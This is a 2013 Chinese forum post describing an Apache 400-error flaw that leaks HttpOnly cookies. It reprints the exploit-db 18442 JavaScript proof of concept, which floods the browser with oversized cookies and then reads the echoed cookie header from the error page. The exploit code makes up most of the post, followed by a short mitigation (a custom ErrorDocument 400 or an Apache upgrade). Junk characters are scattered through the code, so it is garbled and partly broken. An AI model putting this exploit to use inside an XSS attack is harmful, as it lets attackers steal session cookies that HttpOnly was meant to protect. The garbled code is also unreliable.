很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。+ t& O/ j4 }5 l) _
+ Z8 e s( Y$ H" K, F
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:1 X% p% ?2 q; o9 b2 @( C. W
+ [+ x3 m% ]& r, L' E. t
( [' ~7 a5 a# C
// http://www.exploit-db.com/exploits/18442/
% ~0 U. r, W Z. [% ~( ]function setCookies (good) {
' Z& d) O9 M% a// Construct string for cookie value# u9 V( q$ f" F
var str = "";1 Z$ {8 r$ R( I+ Y- E. L
for (var i=0; i< 819; i++) {( }' H$ P. R' z! |2 K$ ^, R- O
str += "x";
* ~3 H- A- \ X: N/ b}
8 Q5 \! i& r0 S// Set cookies
* g& Y- }* Y+ w/ O* T4 gfor (i = 0; i < 10; i++) { S0 R" Q7 B; A% z$ |
// Expire evil cookie" q1 n1 X+ E( y- t- K+ ?
if (good) {
! P) u1 h2 X; U0 }$ c& X; v5 svar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
7 H- T5 E3 y) J" A4 q}
5 M4 i/ H- X `% g// Set evil cookie/ W6 q$ _7 j; n8 O( q/ v
else {* |$ P8 U$ L3 \$ B$ P- Y& I
var cookie = "xss"+i+"="+str+";path=/";4 T# \+ L6 K" {7 I+ C
}
) ~8 E" Q1 T0 J8 @, tdocument.cookie = cookie;
: s4 t3 ?$ H9 a3 k$ N5 ^! ]}
6 {# p; n3 a" B}
8 m) S [3 H9 J* zfunction makeRequest() {" @9 ^. \* a4 S5 C$ s3 j
setCookies();# U! W4 a3 u l9 _ _7 a
function parseCookies () {9 R" Z7 g4 m' N8 X* R
var cookie_dict = {};
# S7 K9 V# W8 k6 Y// Only react on 400 status
! l X; B; t9 o7 l) ^( F! Cif (xhr.readyState === 4 && xhr.status === 400) {- {( n. x6 b1 H% b* W7 } ]( q
// Replace newlines and match <pre> content
+ p" A& f6 B8 D% s+ o5 Hvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);& z6 B8 U: U& u! g! p0 d% H
if (content.length) {8 G+ G- b* @8 l( L. W
// Remove Cookie: prefix
# i0 O, U6 {$ d# V1 Rcontent = content[1].replace("Cookie: ", "");
q" |( O) d7 E( M Q9 t% K" Tvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);. `& T& d6 N/ e X L
// Add cookies to object" w: R+ s* P/ v; p) e: X+ J
for (var i=0; i<cookies.length; i++) {
: |/ Z" k1 a6 A' Evar s_c = cookies.split('=',2);8 j8 x+ c" A. G1 `$ V% ^. I
cookie_dict[s_c[0]] = s_c[1];2 I* L& A, y! _* V0 t1 i7 t6 C
}# P# M: O Y7 v0 p" p. q; H+ `& b
}( g5 d" q8 [2 n* o$ N# w+ e
// Unset malicious cookies7 @* f& y4 c& c( }6 p0 V
setCookies(true);7 v; Y+ _/ F. r# q" Q2 A6 R
alert(JSON.stringify(cookie_dict));% q8 M' T9 g) c0 s
}
* Y- C9 G( r: Y. T- _' I! f}
: J& o0 @( e I+ D" H; S. _// Make XHR request
% f& n0 }) P$ G3 c7 f$ `var xhr = new XMLHttpRequest();
, l) Z) c. j1 _1 Z8 W/ hxhr.onreadystatechange = parseCookies;
# ^- I! @$ k, g4 h: c( \ B, ^xhr.open("GET", "/", true);
) j! `) H3 Q2 H5 Y2 o& axhr.send(null);, W' J3 _6 f5 _& |( B) ?& b, P% O
}
& |0 I# j4 r$ q" Z' U+ B0 Y- BmakeRequest();% k% R' V6 _6 l- b4 u {
( ^/ ^9 k5 r1 y* M( R6 n, l
你就能看见华丽丽的400错误包含着cookie信息。
! ?/ q, L; o, A D
& S) k& Q% W: |" l b+ A$ f) L下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
0 y' ^& e7 ^, y0 h6 M7 H9 Z
* w7 r* N3 O3 O' V/ e" z修复方案:
7 @* ]5 B6 i2 }8 t
4 H' l0 K( c5 }$ y# cApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
0 c7 K* z# p7 T9 M. t5 ^: N% B; ] @: V% H6 V0 K+ a
In the event of a problem or error, Apachecan be configured to do one of four things,
" t" c' @8 n# {! E. A: Y, ~4 f ]$ F
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
: x# y- `; U" a# Y w2. output acustomized message输出一段信息
& l) w+ m U0 I) M3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 % q: `8 G+ \0 K: ~; W) C3 A
4. redirect to an external URL to handle theproblem/error转向一个外部URL2 G* K! h' I* j/ B/ e
0 p6 E+ A3 y7 n5 q经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容' R" E! l8 O$ k- _5 i
1 F4 K4 [. B- b9 W1 v# ^Apache配置:
o! a; W5 V: Z6 a: H
$ S& F0 `6 ]$ U( B( |4 l9 b2 kErrorDocument400 " security test"
i. N) f6 [$ K; t% d, T0 l4 G
当然,升级apache到最新也可:)。( E* L: X/ J* {
& t- A4 f& s1 n0 X参考:http://httpd.apache.org/security/vulnerabilities_22.html S+ W5 w1 N: U, \
+ @" v( w6 A; K% \4 Q: d) S$ \ |
发表于 2013-4-19 19:15:43
收藏
支持
反对